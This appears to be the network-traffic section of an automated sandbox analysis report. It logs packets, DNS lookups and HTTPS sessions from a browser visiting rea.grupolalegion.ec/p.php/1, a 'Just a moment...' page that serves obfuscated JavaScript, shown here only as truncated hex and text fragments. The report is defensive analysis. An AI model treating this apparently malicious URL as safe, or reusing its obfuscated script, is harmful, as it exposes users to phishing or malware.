                                                                                                                              Mar 7, 2025 13:22:00.412102938 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.412136078 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.412153006 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.413084984 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.413126945 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.413161993 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.413181067 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.413208961 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.413225889 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.415649891 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.415668011 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.415759087 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.415776014 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.415829897 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.419522047 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.419539928 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.419620037 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.419639111 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.419691086 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.425642967 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.425662994 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.425748110 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.425767899 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.425816059 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.448952913 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.448973894 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.449043989 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.449089050 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.449155092 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.451910019 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.451925039 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.451997995 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.452013969 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.452064991 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.476187944 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.476208925 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.476337910 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.476363897 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.476419926 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.502083063 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.502104044 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.502212048 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.502233028 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.502293110 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.502563953 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.502619982 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.502671957 CET44349723190.92.154.206192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:00.502682924 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.502707005 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:00.502728939 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:01.420435905 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:01.717739105 CET49723443192.168.2.8190.92.154.206
                                                                                                                              Mar 7, 2025 13:22:32.614429951 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:32.614475012 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:32.614541054 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:32.614814043 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:32.614835024 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:34.631318092 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:34.661416054 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:34.661432028 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:34.662014008 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:34.667426109 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:34.667524099 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:34.768548965 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:44.305128098 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:44.305201054 CET44349727216.58.206.68192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:44.305249929 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:45.252909899 CET49727443192.168.2.8216.58.206.68
                                                                                                                              Mar 7, 2025 13:22:45.252938986 CET44349727216.58.206.68192.168.2.8

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Mar 7, 2025 13:21:29.050228119 CET53556971.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:29.066993952 CET53557451.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:31.839278936 CET53625161.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:32.552114964 CET5614053192.168.2.81.1.1.1
                                                                                                                              Mar 7, 2025 13:21:32.552239895 CET5888553192.168.2.81.1.1.1
                                                                                                                              Mar 7, 2025 13:21:32.559472084 CET53588851.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:32.560271025 CET53561401.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:35.013667107 CET5812653192.168.2.81.1.1.1
                                                                                                                              Mar 7, 2025 13:21:35.013927937 CET5303753192.168.2.81.1.1.1
                                                                                                                              Mar 7, 2025 13:21:35.122021914 CET53530371.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:35.539036989 CET53581261.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:38.546032906 CET5000953192.168.2.81.1.1.1
                                                                                                                              Mar 7, 2025 13:21:38.546248913 CET6149053192.168.2.81.1.1.1
                                                                                                                              Mar 7, 2025 13:21:38.655625105 CET53614901.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:38.754889965 CET53500091.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:48.841305017 CET53516251.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:21:51.399053097 CET6064953192.168.2.81.1.1.1
                                                                                                                              Mar 7, 2025 13:21:51.608771086 CET53606491.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:03.970877886 CET5930253192.168.2.81.1.1.1
                                                                                                                              Mar 7, 2025 13:22:03.979011059 CET53593021.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:04.727024078 CET138138192.168.2.8192.168.2.255
                                                                                                                              Mar 7, 2025 13:22:07.796832085 CET53634391.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:22.935525894 CET6019053192.168.2.81.1.1.1
                                                                                                                              Mar 7, 2025 13:22:23.043346882 CET53601901.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:28.318165064 CET53535571.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:30.536665916 CET53524441.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:32.605942965 CET5398453192.168.2.81.1.1.1
                                                                                                                              Mar 7, 2025 13:22:32.606084108 CET5207253192.168.2.81.1.1.1
                                                                                                                              Mar 7, 2025 13:22:32.613358974 CET53539841.1.1.1192.168.2.8
                                                                                                                              Mar 7, 2025 13:22:32.613430977 CET53520721.1.1.1192.168.2.8

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Mar 7, 2025 13:21:32.552114964 CET192.168.2.81.1.1.10xbcdStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:21:32.552239895 CET192.168.2.81.1.1.10x84efStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:21:35.013667107 CET192.168.2.81.1.1.10xf4c1Standard query (0)rea.grupolalegion.ecA (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:21:35.013927937 CET192.168.2.81.1.1.10xecb9Standard query (0)rea.grupolalegion.ec65IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:21:38.546032906 CET192.168.2.81.1.1.10xe02dStandard query (0)rea.grupolalegion.ecA (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:21:38.546248913 CET192.168.2.81.1.1.10x90Standard query (0)rea.grupolalegion.ec65IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:21:51.399053097 CET192.168.2.81.1.1.10xeb23Standard query (0)rea.grupolalegion.ecA (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:22:03.970877886 CET192.168.2.81.1.1.10x5887Standard query (0)rea.grupolalegion.ecA (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:22:22.935525894 CET192.168.2.81.1.1.10x9931Standard query (0)rea.grupolalegion.ecA (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:22:32.605942965 CET192.168.2.81.1.1.10x551eStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:22:32.606084108 CET192.168.2.81.1.1.10xecb9Standard query (0)www.google.com65IN (0x0001)false

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Mar 7, 2025 13:21:32.559472084 CET1.1.1.1192.168.2.80x84efNo error (0)www.google.com65IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:21:32.560271025 CET1.1.1.1192.168.2.80xbcdNo error (0)www.google.com142.250.185.164A (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:21:35.539036989 CET1.1.1.1192.168.2.80xf4c1No error (0)rea.grupolalegion.ec190.92.154.206A (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:21:38.754889965 CET1.1.1.1192.168.2.80xe02dNo error (0)rea.grupolalegion.ec190.92.154.206A (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:21:51.608771086 CET1.1.1.1192.168.2.80xeb23No error (0)rea.grupolalegion.ec190.92.154.206A (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:22:03.979011059 CET1.1.1.1192.168.2.80x5887No error (0)rea.grupolalegion.ec190.92.154.206A (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:22:23.043346882 CET1.1.1.1192.168.2.80x9931No error (0)rea.grupolalegion.ec190.92.154.206A (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:22:32.613358974 CET1.1.1.1192.168.2.80x551eNo error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                                                                              Mar 7, 2025 13:22:32.613430977 CET1.1.1.1192.168.2.80xecb9No error (0)www.google.com65IN (0x0001)false

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • rea.grupolalegion.ec
                                                                                                                              • https:

                                                                                                                              HTTPS Proxied Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.849714190.92.154.2064436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-03-07 12:21:37 UTC670OUTGET /p.php/1 HTTP/1.1
                                                                                                                              Host: rea.grupolalegion.ec
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2025-03-07 12:21:37 UTC487INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              content-length: 29998
                                                                                                                              date: Fri, 07 Mar 2025 12:21:37 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                              2025-03-07 12:21:37 UTC881INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c
                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en-US" dir="ltr"><head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" /> <title>Just a moment...</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex,
                                                                                                                              2025-03-07 12:21:37 UTC14994INData Raw: 37 50 56 68 32 18 54 32 50 7d 19 2c 2e 68 32 7b 14 54 50 7d 19 18 31 05 7d 56 7c 2d c2 89 7b 1f 16 7b 06 01 58 3b c2 93 3a 2e 30 36 33 05 c2 83 23 58 c2 97 2e 33 31 33 05 3b 7f c2 80 3b 0c 73 69 7a 65 3a 2e 38 37 50 3b 14 54 33 31 33 05 3b 11 3a 32 05 20 30 13 3a 2e 33 37 50 20 31 05 c2 92 2d 64 75 5f 12 3a 2e 32 73 c2 92 2d 70 72 6f 70 47 74 79 3a 06 63 2f 2c 09 63 2f 2c 63 2f c2 92 2d 74 69 6d 0b 67 2d 66 75 6e 63 12 3a 65 61 73 65 7d 16 3a 68 6f 76 47 44 c2 80 56 c2 94 18 2e 37 50 3b 14 54 31 32 50 3b 11 3a 30 0e c2 94 2d 0b 6e 47 7b 09 59 70 3a 31 70 78 c2 83 23 64 39 64 39 64 39 13 1d 3a 31 05 13 2d 59 70 3a 31 05 c2 87 62 6f 74 68 3b 1c 3a 22 22 3b 15 74 61 62 4f c2 8a 4f 66 74 13 2d 72 04 54 1a 35 30 25 56 51 11 1d 3a 2e 50 56 c2 85 7b 1f 2e c2 85
                                                                                                                              Data Ascii: 7PVh2T2P},.h2{TP}1}V|-{{X;:.063#X.313;;size:.87P;T313;:2 0:.37P 1-du_:.2s-propGty:c/,c/,c/-timg-func:ease}:hovGDV.7P;T12P;:0-nG{Yp:1px#d9d9d9:1-Yp:1both;:"";tabOOft-rT50%VQ:.PV{.
                                                                                                                              2025-03-07 12:21:37 UTC14123INData Raw: 5a 31 71 6c 4d 4b 67 59 35 49 75 5a 59 6a 50 74 37 48 46 48 58 77 30 35 48 33 58 42 70 42 6b 4e 36 56 61 76 66 69 30 73 4e 4d 4a 51 6d 4c 6e 32 39 39 65 51 79 43 64 4b 70 30 78 34 6c 62 6d 4f 71 4f 4c 42 6c 39 37 35 57 78 43 4e 4b 58 73 70 30 6d 62 61 57 66 59 38 76 48 64 4c 67 36 46 6b 47 36 6b 4b 2f 39 35 47 31 4d 41 38 65 58 44 61 71 56 43 55 48 61 75 71 4c 33 73 69 53 6d 6e 57 4d 4c 65 6c 65 4f 51 5a 41 32 34 6d 34 65 39 52 50 54 33 6f 45 50 75 6c 2b 4f 77 46 76 75 6c 75 38 63 59 4c 71 78 66 56 4c 37 59 67 6a 63 5a 47 73 31 35 78 54 54 6d 78 2f 48 33 5a 30 58 51 65 71 4c 62 54 44 70 43 4e 4f 6e 70 4e 58 50 33 70 6f 64 51 57 71 36 37 6f 57 64 54 4e 64 4f 4c 58 6b 77 45 34 4c 55 55 62 62 2f 42 67 72 59 30 67 4a 42 79 73 76 61 38 51 75 4b 69 44 5a 46 6b
                                                                                                                              Data Ascii: Z1qlMKgY5IuZYjPt7HFHXw05H3XBpBkN6Vavfi0sNMJQmLn299eQyCdKp0x4lbmOqOLBl975WxCNKXsp0mbaWfY8vHdLg6FkG6kK/95G1MA8eXDaqVCUHauqL3siSmnWMLeleOQZA24m4e9RPT3oEPul+OwFvulu8cYLqxfVL7YgjcZGs15xTTmx/H3Z0XQeqLbTDpCNOnpNXP3podQWq67oWdTNdOLXkwE4LUUbb/BgrY0gJBysva8QuKiDZFk


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.849713190.92.154.2064436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-03-07 12:21:38 UTC542OUTGET /p.php/1?js HTTP/1.1
                                                                                                                              Host: rea.grupolalegion.ec
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                              Referer: https://rea.grupolalegion.ec/p.php/1
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2025-03-07 12:21:38 UTC563INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                              content-type: application/javascript
                                                                                                                              cache-control: public, max-age=604800
                                                                                                                              expires: Fri, 14 Mar 2025 12:21:38 GMT
                                                                                                                              content-length: 7901
                                                                                                                              date: Fri, 07 Mar 2025 12:21:38 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                              2025-03-07 12:21:38 UTC805INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 24 2c 78 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 24 2c 78 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 34 33 37 28 6e 2d 34 39 39 2c 24 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 24 2c 78 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 34 33 37 28 24 2d 36 30 35 2c 72 29 7d 66 6f 72 28 76 61 72 20 74 3d 24 28 29 3b 3b 29 74 72 79 7b 69 66 28 70 61 72 73 65 49 6e 74 28 72 28 31 30 38 36 2c 31 30 36 39 2c 31 30 38 30 2c 31 30 39 37 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 6e 28 39 35 31 2c 39 32 39 2c 39 35 38 2c 39 35 34 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 72 28 31 31 33 30 2c 31 31 31 34 2c 31 31 31 33 2c 31 30 39 36 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 72 28 31 30 38 34 2c 31 30 36 35 2c 31 30 39 38
                                                                                                                              Data Ascii: !function($,x){function n($,x,n,r){return _0x2437(n-499,$)}function r($,x,n,r){return _0x2437($-605,r)}for(var t=$();;)try{if(parseInt(r(1086,1069,1080,1097))/1+parseInt(n(951,929,958,954))/2+-parseInt(r(1130,1114,1113,1096))/3*(-parseInt(r(1084,1065,1098
                                                                                                                              2025-03-07 12:21:38 UTC7096INData Raw: 78 2c 72 2c 74 29 7b 72 65 74 75 72 6e 20 6e 28 24 2c 78 2d 32 30 33 2c 78 2d 20 2d 37 32 36 2c 74 2d 32 33 30 29 7d 69 66 28 78 5b 65 28 39 37 2c 31 32 37 2c 31 33 39 2c 39 39 29 5d 28 63 28 31 33 35 35 2c 31 33 36 37 2c 31 33 32 37 2c 31 33 35 34 29 2c 78 5b 63 28 31 34 30 35 2c 31 34 31 36 2c 31 33 38 34 2c 31 33 38 36 29 5d 29 29 7b 76 61 72 20 75 3d 72 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 29 7b 76 61 72 20 78 3d 74 5b 65 28 31 35 31 33 2c 31 33 30 2c 31 32 37 32 2c 31 33 37 38 29 5d 28 24 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 74 3d 6e 75 6c 6c 2c 78 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 72 3d 21 31 2c 75 7d 69 66 28 5f 30 78 34 36 62 30 66 37 29 7b 76 61 72 20 69 3d 5f 30 78 33 63 36 31 66
                                                                                                                              Data Ascii: x,r,t){return n($,x-203,x- -726,t-230)}if(x[e(97,127,139,99)](c(1355,1367,1327,1354),x[c(1405,1416,1384,1386)])){var u=r?function(){if(t){var x=t[e(1513,130,1272,1378)]($,arguments);return t=null,x}}:function(){};return r=!1,u}if(_0x46b0f7){var i=_0x3c61f


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.849716190.92.154.2064436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-03-07 12:21:40 UTC603OUTGET /favicon.ico HTTP/1.1
                                                                                                                              Host: rea.grupolalegion.ec
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://rea.grupolalegion.ec/p.php/1
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2025-03-07 12:21:40 UTC541INHTTP/1.1 404 Not Found
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 796
                                                                                                                              date: Fri, 07 Mar 2025 12:21:40 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                              x-content-type-options: nosniff
                                                                                                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                              2025-03-07 12:21:40 UTC796INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.849717190.92.154.2064436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2025-03-07 12:21:40 UTC354OUTGET /p.php/1?js HTTP/1.1
                                                                                                                              Host: rea.grupolalegion.ec
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2025-03-07 12:21:41 UTC563INHTTP/1.1 200 OK
                                                                                                                              Connection: close
                                                                                                                              x-powered-by: PHP/7.4.33
                                                                                                                              content-type: application/javascript
                                                                                                                              cache-control: public, max-age=604800
                                                                                                                              expires: Fri, 14 Mar 2025 12:21:40 GMT
                                                                                                                              content-length: 7901
                                                                                                                              date: Fri, 07 Mar 2025 12:21:40 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                              x-frame-options: SAMEORIGIN
